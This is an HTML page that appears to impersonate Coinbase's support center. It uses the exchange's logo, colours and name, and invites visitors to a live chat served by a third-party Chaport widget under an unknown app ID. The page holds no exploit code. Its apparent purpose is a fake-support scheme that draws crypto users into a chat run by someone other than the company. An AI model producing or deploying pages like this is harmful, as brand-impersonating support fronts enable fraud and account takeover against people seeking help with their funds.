
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Coinbase Support Center</title>
  <style>
    body {
      margin: 0;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      background: #f4f6f8;
      color: #212529;
    }

    header {
      background-color: #1652f0;
      color: white;
      padding: 2rem;
      text-align: center;
    }

    header img {
      height: 50px;
      margin-bottom: 1rem;
    }

    header h1 {
      margin: 0;
      font-size: 2rem;
    }

    header p {
      margin-top: 0.5rem;
      font-size: 1.1rem;
    }

    main {
      padding: 2rem;
      max-width: 900px;
      margin: auto;
    }

    .support-box {
      background: white;
      padding: 2rem;
      border-radius: 12px;
      box-shadow: 0 4px 12px rgba(0,0,0,0.08);
    }

    .support-box h2 {
      color: #1652f0;
    }

    footer {
      text-align: center;
      padding: 1rem;
      background-color: #e9ecef;
      margin-top: 3rem;
      font-size: 0.9rem;
    }

    a {
      color: #1652f0;
      text-decoration: none;
    }
  </style>
</head>
<body>
<header>
  <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7e/Coinbase_Logo.svg/2560px-Coinbase_Logo.svg.png" alt="Coinbase Logo">
  <h1>Coinbase Support Center</h1>
  <p>Fast and secure support for your Coinbase account.</p>
</header>
<main>
  <div class="support-box">
    <h2>We're Here to Help</h2>
    <p>Need assistance with your Coinbase transactions, wallet, or account settings? Start a live chat below and a support agent will assist you shortly.</p>
    <p>You can also email our verified support team at: <a href="mailto:support@coinbase.com"><strong>support@coinbase.com</strong></a></p>
    <p><strong>Note:</strong> Never share your password or recovery phrases with anyone.</p>
  </div>
</main>
<footer>
  &copy; 2025 Coinbase Inc. All rights reserved. This is a support interface only.
</footer>
<!-- Live Chat Widget (Chaport) -->
<script>
(function(w,d,v3){
  w.chaportConfig = {
    appId : '687adff25f5872b4d5e73089'
  };
  if(w.chaport) return; v3=w.chaport=function(){v3.c(arguments)};
  v3.q=[];v3.c=function(args){v3.q.push(args)};
  var s=d.createElement('script');s.type='text/javascript';s.async=true;
  s.src='https://app.chaport.com/javascripts/insert.js';
  var ss=d.getElementsByTagName('script')[0];ss.parentNode.insertBefore(s,ss);
})(window, document);
</script>
</body>
</html>
